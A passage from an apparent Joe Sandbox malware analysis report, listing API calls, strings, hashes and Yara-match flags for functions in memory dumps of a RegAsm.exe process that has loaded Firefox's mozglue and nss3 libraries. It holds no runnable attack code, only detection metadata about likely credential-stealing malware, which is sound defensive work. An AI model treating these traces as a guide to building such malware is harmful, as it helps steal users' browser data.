                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3161513745-0
                                                                                    • Opcode ID: 0f94aed9f9e8288490c45f0ea3bcf18d7880e5fefac2d99d93fd19e8b59f146f
                                                                                    • Instruction ID: 10bcaa02354316226cd1011811b6f6cbe3df86acbd64ce16145a3b48d94a418c
                                                                                    • Opcode Fuzzy Hash: 0f94aed9f9e8288490c45f0ea3bcf18d7880e5fefac2d99d93fd19e8b59f146f
                                                                                    • Instruction Fuzzy Hash: 8A3141B1E002159FDB10DF768D44AABB7F8EF88614F158429E94AE7710F7349815CBA0
                                                                                    APIs
                                                                                    • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CCADCA0,?,?,?,6CC6E8B5,00000000), ref: 6CC95F1F
                                                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CC6E8B5,00000000), ref: 6CC95F4B
                                                                                    • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CC6E8B5,00000000), ref: 6CC95F7B
                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CC6E8B5,00000000), ref: 6CC95F9F
                                                                                    • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CC6E8B5,00000000), ref: 6CC95FD6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                    • String ID:
                                                                                    • API String ID: 1389714915-0
                                                                                    • Opcode ID: e7588edcbaa0a170840b6dbae2fd1eec7656ed757fee815f605c82653f67b067
                                                                                    • Instruction ID: 34b0596da560ceb680a59a4dc4ec3b858fa18c257579680ec46a11c68e7b1d2e
                                                                                    • Opcode Fuzzy Hash: e7588edcbaa0a170840b6dbae2fd1eec7656ed757fee815f605c82653f67b067
                                                                                    • Instruction Fuzzy Hash: 7231FA353006008FD714CF69C898E2AB7F5FF89329B648698E5578BB95D735EC41CB80
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0041105B
                                                                                    • memset.MSVCRT ref: 0041107D
                                                                                      • Part of subcall function 00410CAC: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CB7
                                                                                      • Part of subcall function 00410CAC: HeapAlloc.KERNEL32(00000000,?,004110AA,00000000,?,00000000,?), ref: 00410CBE
                                                                                      • Part of subcall function 00410CAC: wsprintfW.USER32 ref: 00410CCF
                                                                                    • OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$Heap$AllocCloseH_prologHandleOpenTerminatememsetwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1628159694-0
                                                                                    • Opcode ID: eda3bebae7e381b0fd502df677cdf661e45432fec2b6010a7c0ff375d6191211
                                                                                    • Instruction ID: 36bd9fcb495497175832ad1b73d2d45116fcd412ea3aab7de57d6fc10e614e88
                                                                                    • Opcode Fuzzy Hash: eda3bebae7e381b0fd502df677cdf661e45432fec2b6010a7c0ff375d6191211
                                                                                    • Instruction Fuzzy Hash: 31314C72D01128ABCB21EB90DD85DEFBB79FF09350F10012AF645E2190DB345A85CBE4
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6CC3B532
                                                                                    • moz_xmalloc.MOZGLUE(?), ref: 6CC3B55B
                                                                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC3B56B
                                                                                    • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CC3B57E
                                                                                    • free.MOZGLUE(00000000), ref: 6CC3B58F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 4244350000-0
                                                                                    • Opcode ID: a7267d40d4e58b96ca0b8d01cf80bd40bc9dfe84475cd246c8b6c53e5130c21e
                                                                                    • Instruction ID: ec7394e26f6af462654aa3d55240f11a59f7427cbfa27b1916e3aad7d49cc969
                                                                                    • Opcode Fuzzy Hash: a7267d40d4e58b96ca0b8d01cf80bd40bc9dfe84475cd246c8b6c53e5130c21e
                                                                                    • Instruction Fuzzy Hash: 5521F371A006159BDB008FA9DC50BAABBB9FF82308F284129E818DB351F776D911C7A1
                                                                                    APIs
                                                                                    • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CC3B7CF
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC3B808
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC3B82C
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC3B840
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC3B849
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1977084945-0
                                                                                    APIs
                                                                                    • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CC96E78
                                                                                      • Part of subcall function 6CC96A10: InitializeCriticalSection.KERNEL32(6CCBF618), ref: 6CC96A68
                                                                                      • Part of subcall function 6CC96A10: GetCurrentProcess.KERNEL32 ref: 6CC96A7D
                                                                                      • Part of subcall function 6CC96A10: GetCurrentProcess.KERNEL32 ref: 6CC96AA1
                                                                                      • Part of subcall function 6CC96A10: EnterCriticalSection.KERNEL32(6CCBF618), ref: 6CC96AAE
                                                                                      • Part of subcall function 6CC96A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC96AE1
                                                                                      • Part of subcall function 6CC96A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC96B15
                                                                                      • Part of subcall function 6CC96A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CC96B65
                                                                                      • Part of subcall function 6CC96A10: LeaveCriticalSection.KERNEL32(6CCBF618,?,?), ref: 6CC96B83
                                                                                    • MozFormatCodeAddress.MOZGLUE ref: 6CC96EC1
                                                                                    • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC96EE1
                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC96EED
                                                                                    • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CC96EFF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                    • String ID:
                                                                                    • API String ID: 4058739482-0
                                                                                    APIs
                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6CC976F2
                                                                                    • moz_xmalloc.MOZGLUE(00000001), ref: 6CC97705
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CC97717
                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CC9778F,00000000,00000000,00000000,00000000), ref: 6CC97731
                                                                                    • free.MOZGLUE(00000000), ref: 6CC97760
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 2538299546-0
                                                                                    APIs
                                                                                      • Part of subcall function 6CDE5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CDE5B56
                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CDE2CEC
                                                                                      • Part of subcall function 6CDFC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CDFC2BF
                                                                                    • PR_EnterMonitor.NSS3(?), ref: 6CDE2D02
                                                                                    • PR_EnterMonitor.NSS3(?), ref: 6CDE2D1F
                                                                                    • PR_ExitMonitor.NSS3(?), ref: 6CDE2D42
                                                                                    • PR_ExitMonitor.NSS3(?), ref: 6CDE2D5B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                    • String ID:
                                                                                    • API String ID: 1593528140-0
                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CC33DEF), ref: 6CC70D71
                                                                                    • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CC33DEF), ref: 6CC70D84
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CC33DEF), ref: 6CC70DAF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Free$Alloc
                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                    • API String ID: 1852963964-2186867486
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(000000FF), ref: 6CC9586C
                                                                                    • CloseHandle.KERNEL32 ref: 6CC95878
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CC95898
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC958C9
                                                                                    • free.MOZGLUE(00000000), ref: 6CC958D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CloseHandleObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1910681409-0
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6CC875C4,?), ref: 6CC8762B
                                                                                      • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                                    • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6CC874D7,6CC915FC,?,?,?), ref: 6CC87644
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8765A
                                                                                    • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC874D7,6CC915FC,?,?,?), ref: 6CC87663
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC874D7,6CC915FC,?,?,?), ref: 6CC87677
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 418114769-0
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 0041A15D
                                                                                      • Part of subcall function 0041A334: __getptd_noexit.LIBCMT ref: 0041A337
                                                                                      • Part of subcall function 0041A334: __amsg_exit.LIBCMT ref: 0041A344
                                                                                    • __getptd.LIBCMT ref: 0041A174
                                                                                    • __amsg_exit.LIBCMT ref: 0041A182
                                                                                    • __lock.LIBCMT ref: 0041A192
                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 0041A1A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                    • String ID:
                                                                                    • API String ID: 938513278-0
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00407898
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00407DE7
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00407DFB
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                      • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                      • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                      • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
                                                                                    • String ID: #
                                                                                    • API String ID: 3207582090-1885708031
                                                                                    • Opcode ID: 4ecc4832899fac776391c8da2cf9c5fddb3acc767da0c9f683104648ff689546
                                                                                    • Instruction ID: 2b191016455699362fcd8800b651534acdba5a724bbeaf5e9f6c94e3a6660c1a
                                                                                    • Opcode Fuzzy Hash: 4ecc4832899fac776391c8da2cf9c5fddb3acc767da0c9f683104648ff689546
                                                                                    • Instruction Fuzzy Hash: 95125B7180424DEADB15EBE0C956BEEBB74AF18308F5040BEE406725C2DB78174DDB66
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC91800
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                      • Part of subcall function 6CC34290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC73EBD,6CC73EBD,00000000), ref: 6CC342A9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                                                                    • String ID: Details$name${marker.name} - {marker.data.name}
                                                                                    • API String ID: 46770647-1733325692
                                                                                    • Opcode ID: 995c73df8f6356d2ba5b30a447ffc2068d64873becc3a2df5529bf0a0407fe06
                                                                                    • Instruction ID: a5891527008dc0ecd9b7240de715659ce99935eaf5326d9181fe0ebb85e390cb
                                                                                    • Opcode Fuzzy Hash: 995c73df8f6356d2ba5b30a447ffc2068d64873becc3a2df5529bf0a0407fe06
                                                                                    • Instruction Fuzzy Hash: E1710270A007469FCB04CF68D49079ABBB5FF85304F00466DD8195BB41EB71B6A8CBE1
                                                                                    APIs
                                                                                    • free.MOZGLUE(?,?,6CC9B0A6,6CC9B0A6,?,6CC9AF67,?,00000010,?,6CC9AF67,?,00000010,00000000,?,?,6CC9AB1F), ref: 6CC9B1F2
                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,6CC9B0A6,6CC9B0A6,?,6CC9AF67,?,00000010,?,6CC9AF67,?,00000010,00000000,?), ref: 6CC9B1FF
                                                                                    • free.MOZGLUE(?,?,?,map/set<T> too long,?,?,6CC9B0A6,6CC9B0A6,?,6CC9AF67,?,00000010,?,6CC9AF67,?,00000010), ref: 6CC9B25F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$Xlength_error@std@@
                                                                                    • String ID: map/set<T> too long
                                                                                    • API String ID: 1922495194-1285458680
                                                                                    • Opcode ID: 46755a798d489d960d1e51a683cd40ee1851beb90b7205f47c7e979d66bcea86
                                                                                    • Instruction ID: dfdbc7fd8e3037973d1f0b87857b0ce1e35262c6bf458a2fb2f5787549ad38b3
                                                                                    • Opcode Fuzzy Hash: 46755a798d489d960d1e51a683cd40ee1851beb90b7205f47c7e979d66bcea86
                                                                                    • Instruction Fuzzy Hash: 66619B74604645AFDB11CF19C890A9ABBF1FF4A318F28C1A9D8598FB52E331EC45CB91
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D4F2
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D50B
                                                                                      • Part of subcall function 6CC3CFE0: EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC3CFF6
                                                                                      • Part of subcall function 6CC3CFE0: LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC3D026
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D52E
                                                                                    • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC5D690
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBE784,?,?,?,?,?,?,?,00000000,76232FE0,00000001,?,6CC6D1C5), ref: 6CC5D751
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                                                                    • String ID: MOZ_CRASH()
                                                                                    • API String ID: 3805649505-2608361144
                                                                                    • Opcode ID: 9324e62dece960d2490d874f64007249107d7a9f1e92cbd2ac88fad31ac84f05
                                                                                    • Instruction ID: 0d1f7d30113175e48c008f9823ff459383209b486944bb581d9d8af081d69c90
                                                                                    • Opcode Fuzzy Hash: 9324e62dece960d2490d874f64007249107d7a9f1e92cbd2ac88fad31ac84f05
                                                                                    • Instruction Fuzzy Hash: CA510171A047018FD714CF69C2D021AB7F1EB89744FA44A2EE59AD7F84EB70E821CB85
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldiv
                                                                                    • String ID: -%llu$.$profiler-paused
                                                                                    • API String ID: 3732870572-2661126502
                                                                                    • Opcode ID: e50acc06b729fa1e0b1f2cc62a80a174153e63e6c25daee0ddadc92d981462c8
                                                                                    • Instruction ID: ac55f1f030cb56c0be428795b31f8d0d60ac0c4f57ef4aaeee18c4939347482d
